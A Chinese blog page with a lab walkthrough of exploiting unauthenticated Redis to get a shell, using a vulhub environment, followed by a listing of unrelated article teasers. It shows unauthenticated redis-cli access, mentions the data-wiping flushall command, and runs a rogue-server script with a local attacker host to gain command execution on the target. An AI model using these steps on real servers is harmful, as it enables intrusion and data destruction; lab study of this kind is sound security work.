当前位置：首页 > news >正文

Redis未授权访问漏洞导致getshell

news 2026/2/10 14:15:35

一、漏洞信息

redis默认情况下会绑定在本地6379端口，如果没有进行采用相关的策略，就会将redis服务暴露到公网上，如果再没有设置密码认证(一般为空)的情况下，会导致任意用户可以访问到目标服务器的情况下未授权访问redis以及读取redis的数据。

二、漏洞利用条件

1.redis绑定在6379端口且没有添加防火墙规则避免其他非信任ip访问等安全策略
2.没有设置密码认证，可以免密码远程登陆redis服务

三、环境搭建

这里使用vulhub里面的redis/4-unacc靶场

cd /vulhub/redis/4-unacc        #进入靶场所在目录
docker-compose up -d        #一键启动容器环境
docker ps        #查看是否开启容器

四、漏洞复现

1.在kali上安装redis程序进行服务的链接

apt-get install redis        #安装redis服务
redis常用命令：
1.查看信息：info
2.删除所有数据库内容：flushall
3.刷新数据库：flushdb
4.保存：save
5.设置路径等配置：config set dir dirpath
如果提示无法安装，可能需要更新以下kali源，使用以下命令：
apt-get update

2.使用kali对redis服务进行远程链接

redis-cli -h ip -p 6379        #通过远程链接至redis服务

如果可以直接执行命令且不需要认证说明存在未授权访问漏洞

3.使用脚本工具获取目标的命令执行环境

python3 redis-rogue-server.py --rhost ip --lhost ip

成功获取到目标主机的命令执行环境

Redis未授权访问漏洞导致getshell

一、漏洞信息 redis默认情况下会绑定在本地6379端口，如果没有进行采用相关的策略，就会将redis服务暴露到公网上，如果再没有设置密码认证(一般为空)的情况下，会导致任意用户可以访问到目标服务器的情况下未授权访问redis以及读取r…...

编程日记 2025/2/16 5:07:03

Electron 全面解析：跨平台桌面应用开发指南

引言在当今多平台并存的数字时代，如何高效开发跨平台桌面应用成为开发者面临的重要挑战。Electron作为GitHub开源的跨平台框架，凭借其独特的Web技术融合能力，已成为构建桌面应用的热门选择。本文将深入探讨Electron的核心原理、开发实践及未…...

编程日记 2025/2/16 5:06:01

React核心源码解析 react 特点CPU卡顿IO 卡顿新老 react 架构对比v15v16.8Scheduler 调度器Reconciler 协调器 React fiber原理更新dommount 构建过程 render阶段 — scheduler reconcilerreact源码解析react-domreact-dom/src/client/ReactDOMRoot.js react-reconcilerreact-…...

编程日记 2025/2/16 5:04:57

用大模型学大模型03-数学基础概率论条件概率全概率公式贝叶斯定理

要深入浅出地理解条件概率与贝叶斯定理，可以从以下几个方面入手，结合理论知识和实例进行学习： 贝叶斯定理与智能世界的暗语条件概率，全概率公式与贝叶斯公式的推导，理解和应用拉普拉斯平滑贝叶斯解决垃圾邮件分类 …...

编程日记 2025/2/16 5:01:50

C++ Primer 参数传递

欢迎阅读我的【CPrimer】专栏专栏简介：本专栏主要面向C初学者，解释C的一些基本概念和基础语言特性，涉及C标准库的用法，面向对象特性，泛型特性高级用法。通过使用标准库中定义的抽象设施，使你更加适应高级…...

编程日记 2025/2/16 4:59:43

Jupyter lab 无法导出格式 Save and Export Notebook As无法展开

本来尝试jypyter lab如何导出HTML带有侧边导航栏，一顿操作后发现还是没实现。又突然发现导出其他格式地功能不能用了，浏览器里Save and Export Notebook As展开按钮为灰色打不开。经典想实现的没实现还把原先的搞坏了。看了jupyter lab的运行信息发…...

编程日记 2025/2/16 4:58:35

Mac之JDK安装

Mac之JDK安装一.安装 jdk 打开终端输入命令:java -version 查看是否已安装 JDK Oracle 官方下载地址根据自己Mac 系统安装查看 Mac 系统，打开中断命令，输入: uname -a Compressed Archive 是压缩文档，下载的是一个 .tar.gz 压缩包 D…...

编程日记 2025/2/16 4:55:29

OpenEuler学习笔记（三十一）：在OpenEuler上搭建仓颉语言开发环境

仓颉语言（Cangjie programming language）相对较为小众，截至2025年，并没有广泛的资料和成熟的通用搭建流程。不过下面为你提供一个较为通用的在OpenEuler上搭建开发环境的大致思路，你可以根据实际情况进行调整。 1. 安…...

编程日记 2025/2/16 4:52:23

2021年全国研究生数学建模竞赛华为杯E题信号干扰下的超宽带(UWB)精确定位问题求解全过程文档及程序

2021年全国研究生数学建模竞赛华为杯 E题信号干扰下的超宽带(UWB)精确定位问题原题再现： 一、背景 UWB（Ultra-Wideband）技术也被称之为“超宽带”，又称之为脉冲无线电技术。这是一种无需任何载波，通过发送纳秒…...

编程日记 2025/2/16 4:47:14

【电脑】u盘重装win7

u盘必须8GB以上 1. CPU型号首先查看CPU的型号看看到底能不能装win7 2. 下载光盘映像文件网址看电脑是多少位的机器(32位下载x86 64位下载x64) 一共是这么多个版本按需下载对应的版本电脑小白推荐无脑下载旗舰版将链接复制到迅雷进行下载 3. 下载软碟通网址下…...

编程日记 2025/2/16 4:42:08

HCIA项目实践--RIP的拓展配置

9.4.7 RIP的拓展配置 （1）RIPV2的手工认证 RIPv2 的手工认证是增强网络安全性的手段。管理员手动配置密钥，路由器在收发 RIPv2 路由更新消息时，会对消息中的认证信息进行检查。发送方添加密钥，接收方用预设密钥验证。若…...

编程日记 2025/2/16 4:38:01

常用架构图：业务架构、产品架构、系统架构、数据架构、技术架构、应用架构、功能架构及信息架构

文章目录引言常见的架构图I 业务架构图-案例模块功能说明1. 用户界面层 (UI)2. 应用服务层3. 数据管理层4. 基础设施层业务流程图示例技术实现II 功能架构图 -案例功能模块说明1. 船舶监控模块2. 报警管理模块3. 应急响应模块4. 通信管理模块5. 数据分析模块数据管理层基础设施…...

编程日记 2025/2/16 4:36:59

初阶c语言（练习题，猜随机数，关机程序）

目录第一题，使用函数编写一个随机数，然后自己猜，猜随机数第二道题（关机程序） 实现代码（关机程序） 实现代码（猜数字） 前言： 学习c语言，学习…...

编程日记 2025/2/16 4:33:52

三维重建（十二）——3D先验的使用

文章目录零、最近感受和前言一、使用能够快速得到重建初始化的方法1.1 Colmap（多视角）1.2 深度估计（单视角）二、已知形状模板2.1 人脸2.2 人体2.3 动物三、刚性与非刚性约束（变形约束）3.1 刚性变形3.2 非刚性变形四、统计（深度学习）先验——从大量（3D）数据中提取信息…...

编程日记 2025/2/16 4:32:50

DDoS技术解析

这里是Themberfue 今天我们不聊别的，我们聊聊著名的网络攻击手段之一的 DDoS，看看其背后的技术细节。 DoS 了解 DDoS 前，先来讲讲 DoS 是什么，此 DoS 而不是 DOS 操作系统啊。1996年9月6日，世界第三古老的网络服务提供…...

编程日记 2025/2/16 4:26:40

总结：如何在SpringBoot中使用https协议以及自签证书？

总结：如何在SpringBoot中使用https协议以及自签证书？ 前提一：什么是http协议？前提二：什么是https协议？一生成自签证书二将证书转换为PKCS12格式三配置SpringBoot（1）修改配置文件&a…...

编程日记 2025/2/16 4:23:32

Django开发入门 – 4.创建Django app

Django开发入门 – 4.创建Django app Create A Django App Under An Existing Project By JacksonML 1. 什么是Django app? Django项目面向Web应用程序，它会由一个或多个子模块组成，这些子模块称为apps。 Django apps负责执行完整Web应用程序中涉及…...

编程日记 2025/2/16 4:20:28